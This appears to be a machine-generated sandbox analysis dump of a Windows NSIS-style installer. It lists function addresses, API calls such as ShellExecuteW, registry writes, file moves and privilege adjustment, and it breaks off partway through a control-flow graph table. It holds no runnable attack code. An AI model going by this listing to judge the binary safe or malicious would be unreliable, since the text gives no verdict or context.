3518 404112 DestroyWindow 3517->3518 3518->3476 3519 40412c CreateDialogParamW 3518->3519 3519->3476 3520 40415f 3519->3520 3521 404247 19 API calls 3520->3521 3522 40416a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3521->3522 3523 401389 2 API calls 3522->3523 3524 4041b0 3523->3524 3524->3475 3525 4041b8 ShowWindow 3524->3525 3526 404293 SendMessageW 3525->3526 3526->3476 3527->3507 3528->3510 3529->3513 3531 401389 2 API calls 3530->3531 3532 401420 3531->3532 3532->3500 4430 4014f1 SetForegroundWindow 4431 402a4c 4430->4431 4432 401673 4433 402bbf 18 API calls 4432->4433 4434 40167a 4433->4434 4435 402bbf 18 API calls 4434->4435 4436 401683 4435->4436 4437 402bbf 18 API calls 4436->4437 4438 40168c MoveFileW 4437->4438 4439 40169f 4438->4439 4445 401698 4438->4445 4440 4064c6 2 API calls 4439->4440 4443 4021e1 4439->4443 4442 4016ae 4440->4442 4441 401423 25 API calls 4441->4443 4442->4443 4444 406024 38 API calls 4442->4444 4444->4445 4445->4441 4446 401cfa GetDlgItem GetClientRect 4447 402bbf 18 API calls 4446->4447 4448 401d2c LoadImageW SendMessageW 4447->4448 4449 401d4a DeleteObject 4448->4449 4450 402a4c 4448->4450 4449->4450 3942 4027fb 3943 402bbf 18 API calls 3942->3943 3944 402802 FindFirstFileW 3943->3944 3945 40282a 3944->3945 3949 402815 3944->3949 3946 402833 3945->3946 3950 4060ca wsprintfW 3945->3950 3951 406183 lstrcpynW 3946->3951 3950->3946 3951->3949 3952 40237b 3953 402381 3952->3953 3954 402bbf 18 API calls 3953->3954 3955 402393 3954->3955 3956 402bbf 18 API calls 3955->3956 3957 40239d RegCreateKeyExW 3956->3957 3958 4023c7 3957->3958 3959 402a4c 3957->3959 3960 4023e2 3958->3960 3961 402bbf 18 API calls 3958->3961 3965 4023ee 3960->3965 3969 402ba2 3960->3969 3962 4023d8 lstrlenW 3961->3962 3962->3960 3964 402409 RegSetValueExW 3967 40241f RegCloseKey 3964->3967 3965->3964 3966 4030e7 45 API calls 3965->3966 3966->3964 3967->3959 3970 4061a5 18 API calls 3969->3970 3971 402bb6 3970->3971 3971->3965 4465 4014ff 4466 401507 4465->4466 4468 40151a 4465->4468 4467 402ba2 18 API calls 4466->4467 4467->4468 4469 401000 4470 401037 BeginPaint GetClientRect 4469->4470 4471 40100c DefWindowProcW 4469->4471 4473 4010f3 4470->4473 4474 401179 4471->4474 4475 401073 CreateBrushIndirect FillRect DeleteObject 4473->4475 4476 4010fc 4473->4476 4475->4473 4477 401102 CreateFontIndirectW 4476->4477 4478 401167 EndPaint 4476->4478 4477->4478 4479 401112 6 API calls 4477->4479 4478->4474 4479->4478 4480 401904 4481 40193b 4480->4481 4482 402bbf 18 API calls 4481->4482 4483 401940 4482->4483 4484 405974 69 API calls 4483->4484 4485 401949 4484->4485 4486 402d04 4487 402d16 SetTimer 4486->4487 4488 402d2f 4486->4488 4487->4488 4489 402d7d 4488->4489 4490 402d83 MulDiv 4488->4490 4491 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4490->4491 4491->4489 4500 402786 4501 40278d 4500->4501 4503 4029f7 4500->4503 4502 402ba2 18 API calls 4501->4502 4504 402798 4502->4504 4505 40279f SetFilePointer 4504->4505 4505->4503 4506 4027af 4505->4506 4508 4060ca wsprintfW 4506->4508 4508->4503 4509 401907 4510 402bbf 18 API calls 4509->4510 4511 40190e 4510->4511 4512 4058c8 MessageBoxIndirectW 4511->4512 4513 401917 4512->4513 3411 401e08 3412 402bbf 18 API calls 3411->3412 3413 401e0e 3412->3413 3414 402bbf 18 API calls 3413->3414 3415 401e17 3414->3415 3416 402bbf 18 API calls 3415->3416 3417 401e20 3416->3417 3418 402bbf 18 API calls 3417->3418 3419 401e29 3418->3419 3420 401423 25 API calls 3419->3420 3421 401e30 ShellExecuteW 3420->3421 3422 401e61 3421->3422 4519 40398a 4520 403995 4519->4520 4521 40399c GlobalAlloc 4520->4521 4522 403999 4520->4522 4521->4522 4523 401491 4524 4052e2 25 API calls 4523->4524 4525 401498 4524->4525 3543 402095 3544 402bbf 18 API calls 3543->3544 3545 40209c 3544->3545 3546 402bbf 18 API calls 3545->3546 3547 4020a6 3546->3547 3548 402bbf 18 API calls 3547->3548 3549 4020b0 3548->3549 3550 402bbf 18 API calls 3549->3550 3551 4020ba 3550->3551 3552 402bbf 18 API calls 3551->3552 3554 4020c4 3552->3554 3553 402103 CoCreateInstance 3558 402122 3553->3558 3554->3553 3555 402bbf 18 API calls 3554->3555 3555->3553 3556 401423 25 API calls 3557 4021e1 3556->3557 3558->3556 3558->3557 4533 401a15 4534 402bbf 18 API calls 4533->4534 4535 401a1e ExpandEnvironmentStringsW 4534->4535 4536 401a32 4535->4536 4538 401a45 4535->4538 4537 401a37 lstrcmpW 4536->4537 4536->4538 4537->4538 4539 402515 4540 402bbf 18 API calls 4539->4540 4541 40251c 4540->4541 4544 405d58 GetFileAttributesW CreateFileW 4541->4544 4543 402528 4544->4543 4545 404395 lstrlenW 4546 4043b4 4545->4546 4547 4043b6 WideCharToMultiByte 4545->4547 4546->4547 4548 401b16 4549 402bbf 18 API calls 4548->4549 4550 401b1d 4549->4550 4551 402ba2 18 API calls 4550->4551 4552 401b26 wsprintfW 4551->4552 4553 402a4c 4552->4553 4554 40469b 4555 4046d1 4554->4555 4556 4046ab 4554->4556 4558 4042ae 8 API calls 4555->4558 4557 404247 19 API calls 4556->4557 4559 4046b8 SetDlgItemTextW 4557->4559 4560 4046dd 4558->4560 4559->4555 4561 40159b 4562 402bbf 18 API calls 4561->4562 4563 4015a2 SetFileAttributesW 4562->4563 4564 4015b4 4563->4564 3980 40229d 3981 4022a5 3980->3981 3982 4022ab 3980->3982 3984 402bbf 18 API calls 3981->3984 3983 4022b9 3982->3983 3985 402bbf 18 API calls 3982->3985 3986 4022c7 3983->3986 3987 402bbf 18 API calls 3983->3987 3984->3982 3985->3983 3988 402bbf 18 API calls 3986->3988 3987->3986 3989 4022d0 WritePrivateProfileStringW 3988->3989 4565 401f1d 4566 402bbf 18 API calls 4565->4566 4567 401f24 4566->4567 4568 406559 5 API calls 4567->4568 4569 401f33 4568->4569 4570 401fb7 4569->4570 4571 401f4f GlobalAlloc 4569->4571 4571->4570 4572 401f63 4571->4572 4573 406559 5 API calls 4572->4573 4574 401f6a 4573->4574 4575 406559 5 API calls 4574->4575 4576 401f74 4575->4576 4576->4570 4580 4060ca wsprintfW 4576->4580 4578 401fa9 4581 4060ca wsprintfW 4578->4581 4580->4578 4581->4570 3990 40249e 3991 402cc9 19 API calls 3990->3991 3992 4024a8 3991->3992 3993 402ba2 18 API calls 3992->3993 3994 4024b1 3993->3994 3995 4024bc 3994->3995 3999 40281e 3994->3999 3996 4024d5 RegEnumValueW 3995->3996 3997 4024c9 RegEnumKeyW 3995->3997 3998 4024ee RegCloseKey 3996->3998 3996->3999 3997->3998 3998->3999 4582 40149e 4583 4014ac PostQuitMessage 4582->4583 4584 402288 4582->4584 4583->4584 4001 40231f 4002 402324 4001->4002 4003 40234f 4001->4003 4004 402cc9 19 API calls 4002->4004 4005 402bbf 18 API calls 4003->4005 4006 40232b 4004->4006 4007 402356 4005->4007 4008 402335 4006->4008 4012 40236c 4006->4012 4013 402bff RegOpenKeyExW 4007->4013 4009 402bbf 18 API calls 4008->4009 4010 40233c RegDeleteValueW RegCloseKey 4009->4010 4010->4012 4014 402c93 4013->4014 4015 402c2a 4013->4015 4014->4012 4016 402c50 RegEnumKeyW 4015->4016 4017 402c62 RegCloseKey 4015->4017 4019 402c87 RegCloseKey 4015->4019 4022 402bff 5 API calls 4015->4022 4016->4015 4016->4017 4018 406559 5 API calls 4017->4018 4020 402c72 4018->4020 4021 402c76 4019->4021 4020->4021 4023 402ca2 RegDeleteKeyW 4020->4023 4021->4014 4022->4015 4023->4021 3106 405421 3107 405442 GetDlgItem GetDlgItem GetDlgItem 3106->3107 3108 4055cb 3106->3108 3151 40427c SendMessageW 3107->3151 3110 4055d4 GetDlgItem CreateThread CloseHandle 3108->3110 3111 4055fc 3108->3111 3110->3111 3224 4053b5 OleInitialize 3110->3224 3113 405613 ShowWindow ShowWindow 3111->3113 3114 40564c 3111->3114 3115 405627 3111->3115 3112 4054b2 3118 4054b9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3112->3118 3156 40427c SendMessageW 3113->3156 3160 4042ae 3114->3160 3116 405687 3115->3116 3120 405661 ShowWindow 3115->3120 3121 40563b 3115->3121 3116->3114 3127 405695 SendMessageW 3116->3127 3125 405527 3118->3125 3126 40550b SendMessageW SendMessageW 3118->3126 3123 405681 3120->3123 3124 405673 3120->3124 3157 404220 3121->3157 3122 40565a 3130 404220 SendMessageW 3123->3130 3174 4052e2 3124->3174 3131 40553a 3125->3131 3132 40552c SendMessageW 3125->3132 3126->3125 3127->3122 3133 4056ae CreatePopupMenu 3127->3133 3130->3116 3152 404247 3131->3152 3132->3131 3185 4061a5 3133->3185 3137 40554a 3140 405553 ShowWindow 3137->3140 3141 405587 GetDlgItem SendMessageW 3137->3141 3138 4056db GetWindowRect 3139 4056ee TrackPopupMenu 3138->3139 3139->3122 3142 405709 3139->3142 3143 405576 3140->3143 3144 405569 ShowWindow 3140->3144 3141->3122 3145 4055ae SendMessageW SendMessageW 3141->3145 3146 405725 SendMessageW 3142->3146 3155 40427c SendMessageW 3143->3155 3144->3143 3145->3122 3146->3146 3147 405742 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3146->3147 3149 405767 SendMessageW 3147->3149 3149->3149 3150 405790 GlobalUnlock SetClipboardData CloseClipboard 3149->3150 3150->3122 3151->3112 3153 4061a5 18 API calls 3152->3153 3154 404252 SetDlgItemTextW 3153->3154 3154->3137 3155->3141 3156->3115 3158 404227 3157->3158 3159 40422d SendMessageW 3157->3159 3158->3159 3159->3114 3161 4042c6 GetWindowLongW 3160->3161 3162 40434f 3160->3162 3161->3162 3163 4042d7 3161->3163 3162->3122 3164 4042e6 GetSysColor 3163->3164 3165 4042e9 3163->3165 3164->3165 3166 4042f9 SetBkMode 3165->3166 3167 4042ef SetTextColor 3165->3167 3168 404311 GetSysColor 3166->3168 3169 404317 3166->3169 3167->3166 3168->3169 3170 404328 3169->3170 3171 40431e SetBkColor 3169->3171 3170->3162 3172 404342 CreateBrushIndirect 3170->3172 3173 40433b DeleteObject 3170->3173 3171->3170 3172->3162 3173->3172 3175 4052fd 3174->3175 3176 40539f 3174->3176 3177 405319 lstrlenW 3175->3177 3178 4061a5 18 API calls 3175->3178 3176->3123 3179 405342 3177->3179 3180 405327 lstrlenW 3177->3180 3178->3177 3182 405355 3179->3182 3183 405348 SetWindowTextW 3179->3183 3180->3176 3181 405339 lstrcatW 3180->3181 3181->3179 3182->3176 3184 40535b SendMessageW SendMessageW SendMessageW 3182->3184 3183->3182 3184->3176 3190 4061b2 3185->3190 3186 4063fd 3187 4056be AppendMenuW 3186->3187 3219 406183 lstrcpynW 3186->3219 3187->3138 3187->3139 3189 406265 GetVersion 3189->3190 3190->3186 3190->3189 3191 4063cb lstrlenW 3190->3191 3194 4061a5 10 API calls 3190->3194 3196 4062e0 GetSystemDirectoryW 3190->3196 3197 4062f3 GetWindowsDirectoryW 3190->3197 3199 406327 SHGetSpecialFolderLocation 3190->3199 3200 4061a5 10 API calls 3190->3200 3201 40636c lstrcatW 3190->3201 3203 406050 RegOpenKeyExW 3190->3203 3208 406417 3190->3208 3217 4060ca wsprintfW 3190->3217 3218 406183 lstrcpynW 3190->3218 3191->3190 3194->3191 3196->3190 3197->3190 3199->3190 3202 40633f SHGetPathFromIDListW CoTaskMemFree 3199->3202 3200->3190 3201->3190 3202->3190 3204 4060c4 3203->3204 3205 406084 RegQueryValueExW 3203->3205 3204->3190 3206 4060a5 RegCloseKey 3205->3206 3206->3204 3215 406424 3208->3215 3209 40649a 3210 40649f CharPrevW 3209->3210 3212 4064c0 3209->3212 3210->3209 3211 40648d CharNextW 3211->3209 3211->3215 3212->3190 3214 406479 CharNextW 3214->3215 3215->3209 3215->3211 3215->3214 3216 406488 CharNextW 3215->3216 3220 405b64 3215->3220 3216->3211 3217->3190 3218->3190 3219->3187 3221 405b6a 3220->3221 3222 405b80 3221->3222 3223 405b71 CharNextW 3221->3223 3222->3215 3223->3221 3231 404293 3224->3231 3226 404293 SendMessageW 3227 405411 OleUninitialize 3226->3227 3228 4053d8 3230 4053ff 3228->3230 3234 401389 3228->3234 3230->3226 3232 4042ab 3231->3232 3233 40429c SendMessageW 3231->3233 3232->3228 3233->3232 3236 401390 3234->3236 3235 4013fe 3235->3228 3236->3235 3237 4013cb MulDiv SendMessageW 3236->3237 3237->3236 4585 401ca3 4586 402ba2 18 API calls 4585->4586 4587 401ca9 IsWindow 4586->4587 4588 401a05 4587->4588 4589 402a27 SendMessageW 4590 402a41 InvalidateRect 4589->4590 4591 402a4c 4589->4591 4590->4591 3438 40242a 3449 402cc9 3438->3449 3440 402434 3441 402bbf 18 API calls 3440->3441 3442 40243d 3441->3442 3443 402448 RegQueryValueExW 3442->3443 3446 40281e 3442->3446 3444 402468 3443->3444 3445 40246e RegCloseKey 3443->3445 3444->3445 3453 4060ca wsprintfW 3444->3453 3445->3446 3450 402bbf 18 API calls 3449->3450 3451 402ce2 3450->3451 3452 402cf0 RegOpenKeyExW 3451->3452 3452->3440 3453->3445 4599 40172d 4600 402bbf 18 API calls 4599->4600 4601 401734 SearchPathW 4600->4601 4602 40174f 4601->4602 4603 4027b4 4604 4027ba 4603->4604 4605 4027c2 FindClose 4604->4605 4606 402a4c 4604->4606 4605->4606 3559 4033b6 SetErrorMode GetVersion 3560 4033ea 3559->3560 3561 4033f0 3559->3561 3562 406559 5 API calls 3560->3562 3650 4064ed GetSystemDirectoryW 3561->3650 3562->3561 3564 403407 3565 4064ed 3 API calls 3564->3565 3566 403411 3565->3566 3567 4064ed 3 API calls 3566->3567 3568 40341b 3567->3568 3653 406559 GetModuleHandleA 3568->3653 3571 406559 5 API calls 3572 403429 #17 OleInitialize SHGetFileInfoW 3571->3572 3659 406183 lstrcpynW 3572->3659 3574 403466 GetCommandLineW 3660 406183 lstrcpynW 3574->3660 3576 403478 GetModuleHandleW 3577 403490 3576->3577 3578 405b64 CharNextW 3577->3578 3579 40349f CharNextW 3578->3579 3580 4035ca GetTempPathW 3579->3580 3587 4034b8 3579->3587 3661 403385 3580->3661 3582 4035e2 3583 4035e6 GetWindowsDirectoryW lstrcatW 3582->3583 3584 40363c DeleteFileW 3582->3584 3588 403385 12 API calls 3583->3588 3671 402e41 GetTickCount GetModuleFileNameW 3584->3671 3585 405b64 CharNextW 3585->3587 3587->3585 3593 4035b5 3587->3593 3595 4035b3 3587->3595 3590 403602 3588->3590 3589 403650 3591 403703 3589->3591 3596 4036f3 3589->3596 3600 405b64 CharNextW 3589->3600 3590->3584 3592 403606 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3590->3592 3774 4038da 3591->3774 3594 403385 12 API calls 3592->3594 3757 406183 lstrcpynW 3593->3757 3598 403634 3594->3598 3595->3580 3701 4039cc 3596->3701 3598->3584 3598->3591 3617 40366f 3600->3617 3603 40383e 3605 4038c2 ExitProcess 3603->3605 3606 403846 GetCurrentProcess OpenProcessToken 3603->3606 3604 40371e 3607 4058c8 MessageBoxIndirectW 3604->3607 3608 403892 3606->3608 3609 40385e LookupPrivilegeValueW AdjustTokenPrivileges 3606->3609 3613 40372c ExitProcess 3607->3613 3616 406559 5 API calls 3608->3616 3609->3608 3611 403734 3783 40584b 3611->3783 3612 4036cd 3758 405c3f 3612->3758 3620 403899 3616->3620 3617->3611 3617->3612 3623 4038ae ExitWindowsEx 3620->3623 3626 4038bb 3620->3626 3621 403755 lstrcatW lstrcmpiW 3621->3591 3625 403771 3621->3625 3622 40374a lstrcatW 3622->3621 3623->3605 3623->3626 3628 403776 3625->3628 3629 40377d 3625->3629 3630 40140b 2 API calls 3626->3630 3627 4036e8 3773 406183 lstrcpynW 3627->3773 3786 4057b1 CreateDirectoryW 3628->3786 3791 40582e CreateDirectoryW 3629->3791 3630->3605 3635 403782 SetCurrentDirectoryW 3636 403792 3635->3636 3637 40379d 3635->3637 3794 406183 lstrcpynW 3636->3794 3795 406183 lstrcpynW 3637->3795 3640 4061a5 18 API calls 3641 4037dc DeleteFileW 3640->3641 3642 4037e9 CopyFileW 3641->3642 3647 4037ab 3641->3647 3642->3647 3643 403832 3645 406024 38 API calls 3643->3645 3645->3591 3646 4061a5 18 API calls 3646->3647 3647->3640 3647->3643 3647->3646 3648 405863 2 API calls 3647->3648 3649 40381d CloseHandle 3647->3649 3796 406024 MoveFileExW 3647->3796 3648->3647 3649->3647 3651 40650f wsprintfW LoadLibraryW 3650->3651 3651->3564 3654 406575 3653->3654 3655 40657f GetProcAddress 3653->3655 3656 4064ed 3 API calls 3654->3656 3657 403422 3655->3657 3658 40657b 3656->3658 3657->3571 3658->3655 3658->3657 3659->3574 3660->3576 3662 406417 5 API calls 3661->3662 3663 403391 3662->3663 3664 40339b 3663->3664 3665 405b37 3 API calls 3663->3665 3664->3582 3666 4033a3 3665->3666 3667 40582e 2 API calls 3666->3667 3668 4033a9 3667->3668 3669 405d87 2 API calls 3668->3669 3670 4033b4 3669->3670 3670->3582 3800 405d58 GetFileAttributesW CreateFileW 3671->3800 3673 402e84 3700 402e91 3673->3700 3801 406183 lstrcpynW 3673->3801 3675 402ea7 3802 405b83 lstrlenW 3675->3802 3679 402eb8 GetFileSize 3680 402fb9 3679->3680 3698 402ecf 3679->3698 3681 402d9f 33 API calls 3680->3681 3683 402fc0 3681->3683 3682 403358 ReadFile 3682->3698 3685 402ffc GlobalAlloc 3683->3685 3683->3700 3808 40336e SetFilePointer 3683->3808 3684 403054 3687 402d9f 33 API calls 3684->3687 3686 403013 3685->3686 3692 405d87 2 API calls 3686->3692 3687->3700 3689 402fdd 3690 403358 ReadFile 3689->3690 3693 402fe8 3690->3693 3691 402d9f 33 API calls 3691->3698 3694 403024 CreateFileW 3692->3694 3693->3685 3693->3700 3695 40305e 3694->3695 3694->3700 3807 40336e SetFilePointer 3695->3807 3697 40306c 3699 4030e7 45 API calls 3697->3699 3698->3680 3698->3682 3698->3684 3698->3691 3698->3700 3699->3700 3700->3589 3702 406559 5 API calls 3701->3702 3703 4039e0 3702->3703 3704 4039e6 3703->3704 3705 4039f8 3703->3705 3818 4060ca wsprintfW 3704->3818 3706 406050 3 API calls 3705->3706 3707 403a28 3706->3707 3709 403a47 lstrcatW 3707->3709 3711 406050 3 API calls 3707->3711 3710 4039f6 3709->3710 3809 403ca2 3710->3809 3711->3709 3714 405c3f 18 API calls 3715 403a79 3714->3715 3716 403b0d 3715->3716 3718 406050 3 API calls 3715->3718 3717 405c3f 18 API calls 3716->3717 3719 403b13 3717->3719 3725 403aab 3718->3725 3720 403b23 LoadImageW 3719->3720 3721 4061a5 18 API calls 3719->3721 3722 403bc9 3720->3722 3723 403b4a RegisterClassW 3720->3723 3721->3720 3727 40140b 2 API calls 3722->3727 3726 403b80 SystemParametersInfoW CreateWindowExW 3723->3726 3756 403bd3 3723->3756 3724 403acc lstrlenW 3729 403b00 3724->3729 3730 403ada lstrcmpiW 3724->3730 3725->3716 3725->3724 3728 405b64 CharNextW 3725->3728 3726->3722 3731 403bcf 3727->3731 3732 403ac9 3728->3732 3734 405b37 3 API calls 3729->3734 3730->3729 3733 403aea GetFileAttributesW 3730->3733 3737 403ca2 19 API calls 3731->3737 3731->3756 3732->3724 3736 403af6 3733->3736 3735 403b06 3734->3735 3819 406183 lstrcpynW 3735->3819 3736->3729 3740 405b83 2 API calls 3736->3740 3738 403be0 3737->3738 3741 403bec ShowWindow 3738->3741 3742 403c6f 3738->3742 3740->3729 3743 4064ed 3 API calls 3741->3743 3744 4053b5 5 API calls 3742->3744 3745 403c04 3743->3745 3746 403c75 3744->3746 3749 403c12 GetClassInfoW 3745->3749 3751 4064ed 3 API calls 3745->3751 3747 403c91 3746->3747 3748 403c79 3746->3748 3750 40140b 2 API calls 3747->3750 3754 40140b 2 API calls 3748->3754 3748->3756 3752 403c26 GetClassInfoW RegisterClassW 3749->3752 3753 403c3c DialogBoxParamW 3749->3753 3750->3756 3751->3749 3752->3753 3755 40140b 2 API calls 3753->3755 3754->3756 3755->3756 3756->3591 3757->3595 3821 406183 lstrcpynW 3758->3821 3760 405c50 3822 405be2 CharNextW CharNextW 3760->3822 3763 4036d9 3763->3591 3772 406183 lstrcpynW 3763->3772 3764 406417 5 API calls 3770 405c66 3764->3770 3765 405c97 lstrlenW 3766 405ca2 3765->3766 3765->3770 3767 405b37 3 API calls 3766->3767 3769 405ca7 GetFileAttributesW 3767->3769 3768 4064c6 2 API calls 3768->3770 3769->3763 3770->3763 3770->3765 3770->3768 3771 405b83 2 API calls 3770->3771 3771->3765 3772->3627 3773->3596 3775 4038f5 3774->3775 3776 4038eb CloseHandle 3774->3776 3777 403909 3775->3777 3778 4038ff CloseHandle 3775->3778 3776->3775 3828 403937 3777->3828 3778->3777 3784 406559 5 API calls 3783->3784 3785 403739 lstrcatW 3784->3785 3785->3621 3785->3622 3787 405802 GetLastError 3786->3787 3788 40377b 3786->3788 3787->3788 3789 405811 SetFileSecurityW 3787->3789 3788->3635 3789->3788 3790 405827 GetLastError 3789->3790 3790->3788 3792 405842 GetLastError 3791->3792 3793 40583e 3791->3793 3792->3793 3793->3635 3794->3637 3795->3647 3797 406038 3796->3797 3799 406045 3796->3799 3882 405eb2 lstrcpyW 3797->3882 3799->3647 3800->3673 3801->3675 3803 405b91 3802->3803 3804 402ead 3803->3804 3805 405b97 CharPrevW 3803->3805 3806 406183 lstrcpynW 3804->3806 3805->3803 3805->3804 3806->3679 3807->3697 3808->3689 3810 403cb6 3809->3810 3820 4060ca wsprintfW 3810->3820 3812 403d27 3813 4061a5 18 API calls 3812->3813 3814 403d33 SetWindowTextW 3813->3814 3815 403a57 3814->3815 3816 403d4f 3814->3816 3815->3714 3816->3815 3817 4061a5 18 API calls 3816->3817 3817->3816 3818->3710 3819->3716 3820->3812 3821->3760 3823 405bff 3822->3823 3825 405c11 3822->3825 3823->3825 3826 405c0c CharNextW 3823->3826 3824 405c35 3824->3763 3824->3764 3825->3824 3827 405b64 CharNextW 3825->3827 3826->3824 3827->3825 3829 403945 3828->3829 3830 40390e 3829->3830 3831 40394a FreeLibrary GlobalFree 3829->3831 3832 405974 3830->3832 3831->3830 3831->3831 3833 405c3f 18 API calls 3832->3833 3834 405994 3833->3834 3835 4059b3 3834->3835 3836 40599c DeleteFileW 3834->3836 3839 405ade 3835->3839 3872 406183 lstrcpynW 3835->3872 3837 40370c OleUninitialize 3836->3837 3837->3603 3837->3604 3839->3837 3845 4064c6 2 API calls 3839->3845 3840 4059d9 3841 4059ec 3840->3841 3842 4059df lstrcatW 3840->3842 3844 405b83 2 API calls 3841->3844 3843 4059f2 3842->3843 3846 405a02 lstrcatW 3843->3846 3847 4059f8 3843->3847 3844->3843 3848 405af8 3845->3848 3849 405a0d lstrlenW FindFirstFileW 3846->3849 3847->3846 3847->3849 3848->3837 3850 405afc 3848->3850 3851 405ad3 3849->3851 3870 405a2f 3849->3870 3852 405b37 3 API calls 3850->3852 3851->3839 3853 405b02 3852->3853 3855 40592c 5 API calls 3853->3855 3854 405ab6 FindNextFileW 3857 405acc FindClose 3854->3857 3854->3870 3858 405b0e 3855->3858 3857->3851 3859 405b12 3858->3859 3860 405b28 3858->3860 3859->3837 3863 4052e2 25 API calls 3859->3863 3862 4052e2 25 API calls 3860->3862 3862->3837 3865 405b1f 3863->3865 3864 405974 62 API calls 3864->3870 3867 406024 38 API calls 3865->3867 3866 4052e2 25 API calls 3866->3854 3868 405b26 3867->3868 3868->3837 3869 4052e2 25 API calls 3869->3870 3870->3854 3870->3864 3870->3866 3870->3869 3871 406024 38 API calls 3870->3871 3873 406183 lstrcpynW 3870->3873 3874 40592c 3870->3874 3871->3870 3872->3840 3873->3870 3875 405d33 2 API calls 3874->3875 3876 405938 3875->3876 3877 405947 RemoveDirectoryW 3876->3877 3878 40594f DeleteFileW 3876->3878 3880 405959 3876->3880 3879 405955 3877->3879 3878->3879 3879->3880 3881 405965 SetFileAttributesW 3879->3881 3880->3870 3881->3880 3883 405f00 GetShortPathNameW 3882->3883 3884 405eda 3882->3884 3886 405f15 3883->3886 3887 40601f 3883->3887 3909 405d58 GetFileAttributesW CreateFileW 3884->3909 3886->3887 3889 405f1d wsprintfA 3886->3889 3887->3799 3888 405ee4 CloseHandle GetShortPathNameW 3888->3887 3890 405ef8 3888->3890 3891 4061a5 18 API calls 3889->3891 3890->3883 3890->3887 3892 405f45 3891->3892 3910 405d58 GetFileAttributesW CreateFileW 3892->3910 3894 405f52 3894->3887 3895 405f61 GetFileSize GlobalAlloc 3894->3895 3896 405f83 3895->3896 3897 406018 CloseHandle 3895->3897 3898 405ddb ReadFile 3896->3898 3897->3887 3899 405f8b 3898->3899 3899->3897 3911 405cbd lstrlenA 3899->3911 3902 405fa2 lstrcpyA 3906 405fc4 3902->3906 3903 405fb6 3904 405cbd 4 API calls 3903->3904 3904->3906 3905 405ffb SetFilePointer 3907 405e0a WriteFile 3905->3907 3906->3905 3908 406011 GlobalFree 3907->3908 3908->3897 3909->3888 3910->3894 3912 405cfe lstrlenA 3911->3912 3913 405d06 3912->3913 3914 405cd7 lstrcmpiA 3912->3914 3913->3902 3913->3903 3914->3913 3915 405cf5 CharNextA 3914->3915 3915->3912 4607 401b37 4608 401b44 4607->4608 4609 401b88 4607->4609 4612 401bcd 4608->4612 4617 401b5b 4608->4617 4610 401bb2 GlobalAlloc 4609->4610 4611 401b8d 4609->4611 4613 4061a5 18 API calls 4610->4613 4625 402288 4611->4625 4628 406183 lstrcpynW 4611->4628 4614 4061a5 18 API calls 4612->4614 4612->4625 4613->4612 4616 402282 4614->4616 4620 4058c8 MessageBoxIndirectW 4616->4620 4626 406183 lstrcpynW 4617->4626 4618 401b9f GlobalFree 4618->4625 4620->4625 4621 401b6a 4627 406183 lstrcpynW 4621->4627 4623 401b79 4629 406183 lstrcpynW 4623->4629 4626->4621 4627->4623 4628->4618 4629->4625 4630 402537 4631 402562 4630->4631 4632 40254b 4630->4632 4634 402596 4631->4634 4635 402567 4631->4635 4633 402ba2 18 API calls 4632->4633 4642 402552 4633->4642 4637 402bbf 18 API calls 4634->4637 4636 402bbf 18 API calls 4635->4636 4638 40256e WideCharToMultiByte lstrlenA 4636->4638 4639 40259d lstrlenW 4637->4639 4638->4642 4639->4642 4640 4025e0 4641 405e0a WriteFile 4641->4640 4642->4640 4643 405e39 5 API calls 4642->4643 4644 4025ca 4642->4644 4643->4644 4644->4640 4644->4641 4645 404a38 4646 404a64 4645->4646 4647 404a48 4645->4647 4649 404a97 4646->4649 4650 404a6a SHGetPathFromIDListW 4646->4650 4656 4058ac GetDlgItemTextW 4647->4656 4652 404a81 SendMessageW 4650->4652 4653 404a7a 4650->4653 4651 404a55 SendMessageW 4651->4646 4652->4649 4655 40140b 2 API calls 4653->4655 4655->4652 4656->4651 4657 4014b8 4658 4014be 4657->4658 4659 401389 2 API calls 4658->4659 4660 4014c6 4659->4660 3916 4015b9 3917 402bbf 18 API calls 3916->3917 3918 4015c0 3917->3918 3919 405be2 4 API calls 3918->3919 3932 4015c9 3919->3932 3920 401629 3922 40165b 3920->3922 3923 40162e 3920->3923 3921 405b64 CharNextW 3921->3932 3925 401423 25 API calls 3922->3925 3924 401423 25 API calls 3923->3924 3926 401635 3924->3926 3931 401653 3925->3931 3935 406183 lstrcpynW 3926->3935 3927 40582e 2 API calls 3927->3932 3929 401642 SetCurrentDirectoryW 3929->3931 3930 40584b 5 API calls 3930->3932 3932->3920 3932->3921 3932->3927 3932->3930 3933 40160f GetFileAttributesW 3932->3933 3934 4057b1 4 API calls 3932->3934 3933->3932 3934->3932 3935->3929 4668 40293b 4669 402ba2 18 API calls 4668->4669 4670 402941 4669->4670 4671 402964 4670->4671 4672 40297d 4670->4672 4677 40281e 4670->4677 4675 402969 4671->4675 4676 40297a 4671->4676 4673 402993 4672->4673 4674 402987 4672->4674 4679 4061a5 18 API calls 4673->4679 4678 402ba2 18 API calls 4674->4678 4682 406183 lstrcpynW 4675->4682 4683 4060ca wsprintfW 4676->4683 4678->4677 4679->4677 4682->4677 4683->4677

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 4033b6-4033e8 SetErrorMode GetVersion 1 4033ea-4033f2 call 406559 0->1 2 4033fb-40348e call 4064ed * 3 call 406559 * 2 #17 OleInitialize SHGetFileInfoW call 406183 GetCommandLineW call 406183 GetModuleHandleW 0->2 1->2 8 4033f4 1->8 20 403490-403497 2->20 21 403498-4034b2 call 405b64 CharNextW 2->21 8->2 20->21 24 4034b8-4034be 21->24 25 4035ca-4035e4 GetTempPathW call 403385 21->25 26 4034c0-4034c5 24->26 27 4034c7-4034cd 24->27 34 4035e6-403604 GetWindowsDirectoryW lstrcatW call 403385 25->34 35 40363c-403656 DeleteFileW call 402e41 25->35 26->26 26->27 29 4034d4-4034d8 27->29 30 4034cf-4034d3 27->30 32 403596-4035a3 call 405b64 29->32 33 4034de-4034e4 29->33 30->29 48 4035a5-4035a6 32->48 49 4035a7-4035ad 32->49 38 4034e6-4034ed 33->38 39 4034fe-403537 33->39 34->35 54 403606-403636 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 34->54 50 403707-403718 call 4038da OleUninitialize 35->50 51 40365c-403662 35->51 43 4034f4 38->43 44 4034ef-4034f2 38->44 45 403554-40358e 39->45 46 403539-40353e 39->46 43->39 44->39 44->43 